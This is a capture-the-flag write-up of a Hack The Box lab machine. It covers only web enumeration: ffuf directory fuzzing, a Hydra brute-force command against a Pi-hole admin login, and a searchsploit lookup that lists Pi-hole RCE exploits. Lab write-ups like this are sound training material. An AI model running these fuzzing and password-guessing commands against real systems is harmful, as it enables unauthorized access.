InfoSec LAB

Mirai_Web

Created: 2 min read

Web

Nmap discovered a web server running on the target port 80 It’s lighttpd 1.4.35

The webserver returns a 404 on the web root

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.10.48/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
 
admin                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 34ms]
versions                [Status: 200, Size: 18, Words: 1, Lines: 1, Duration: 39ms]
:: Progress: [882188/882188] :: Job [1/1] :: 13w34 req/sec :: Duration: [0:12:55] :: Errors: 0 ::

Fuzzing the web root reveals a file and directory; /admin/ and /versions

/versions

┌──(kali㉿kali)-[~/archive/htb/labs/mirai]
└─$ curl http://$IP/versions  
1675170158,,,

Not sure what this represents

/admin/

It’s Pi-Hole

The version information is available at the bottom Pi-hole 3.1.4 Web GUI 3.1 FTL 2.10

There is the login page I tried the default password, raspberry, and it didn’t work.

Brute-Forcing

┌──(kali㉿kali)-[~/archive/htb/labs/mirai]
└─$ hydra -l '' -p /usr/share/wordlists/rockyou.txt 'http-post-form://10.10.10.48/admin/index.php?login:pw=^PASS^:F=Wrong password!'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-31 14:19:19
[data] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[data] attacking http-post-form://10.10.10.48:80/admin/index.php?login:pw=^PASS^:F=Wrong password!
[status] 568.00 tries/min, 568 tries in 00:01h, 14343831 to do in 420:54h, 16 active

I had been running a brute-force attack for about 30 minutes and got nothing out of it.

Vulnerability

┌──(kali㉿kali)-[~/archive/htb/labs/mirai]
└─$ searchsploit Pi-Hole 3.1.4
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
Pi-hole < 4.4 - Authenticated Remote Code Execution                    | linux/webapps/48442.py
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escal | linux/webapps/48443.py
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Pi-Hole < 4.4 is vulnerable to RCE, but it requires authentication.

Interactive Graph View

Backlinks